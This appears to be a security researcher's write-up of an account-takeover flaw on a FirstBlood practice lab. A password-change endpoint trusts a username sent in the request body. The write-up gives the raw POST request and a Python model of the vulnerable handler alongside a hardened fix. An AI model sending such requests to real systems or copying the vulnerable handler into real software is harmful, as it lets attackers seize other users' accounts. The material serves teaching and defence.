Full Account takeover (even for admins)

May 8


There is a commented-out snippet of JS code on /drpanel/index.php. This code is for changing the password of a user; the JS code is incomplete, but one can fill in the blanks easily.

So I guessed that there is an endpoint /drpanel/drapi/editpassword.php that accepts a POST request with a username body parameter. I tried it on my logged-in user and it succeeded, so why stop there? I know from v1 that the admin account username is drAdmin, so I tried it, and indeed I was able to change the password of drAdmin and log in successfully.


POST /drpanel/drapi/editpassword.php HTTP/1.1
Host: <your_instance>.a.firstbloodhackers.com
Cookie: doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9;
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 16

Screenshot: logged in and able to view appointments of patients (which I couldn't do with my self-registered user).


I can take over any user by just knowing the username.
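The broken access check described above, modelled in Python as an added example (this is not code from the writeup or from the FirstBlood application): the vulnerable handler takes the target account from the request body, while the hardened handler binds the change to the session's own user and requires the current password. The in-memory user store, the sample passwords and the session dictionary are constructed stand-ins.

```python
import hashlib
import hmac
import os

ITERATIONS = 100_000


def hash_password(password, salt=None):
    """PBKDF2-SHA256 of the password; returns (salt, digest)."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest


def verify_password(record, password):
    """Constant-time comparison against the stored salt/hash record."""
    _, digest = hash_password(password, record["salt"])
    return hmac.compare_digest(digest, record["hash"])


def make_store():
    """Constructed in-memory user table standing in for the app's database."""
    store = {}
    for name, pw in (("drAdmin", "AdminPass!"), ("drSelf", "SelfPass!")):
        salt, digest = hash_password(pw)
        store[name] = {"salt": salt, "hash": digest}
    return store


def vulnerable_edit_password(store, session, form):
    """The flaw in the writeup: the target account comes from the request
    body, so any logged-in user can reset any other user's password."""
    if not session.get("authed"):
        return 401
    target = store.get(form.get("username"))
    if target is None:
        return 404
    target["salt"], target["hash"] = hash_password(form["password"])
    return 200


def fixed_edit_password(store, session, form):
    """Hardened handler: the account is the one bound to the server-side
    session, and the caller must prove knowledge of the current password."""
    if not session.get("authed"):
        return 401
    me = session["username"]                      # never taken from the body
    if form.get("username") not in (None, me):    # mismatch: log and alert on it
        return 403
    if not verify_password(store[me], form.get("current_password", "")):
        return 403
    store[me]["salt"], store[me]["hash"] = hash_password(form["new_password"])
    return 200
```

A body username that differs from the session user is exactly the signal the vulnerable endpoint ignored; in the hardened version it is a hard failure and a useful detection event.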




Network Security Researcher | Content writer | Blog writer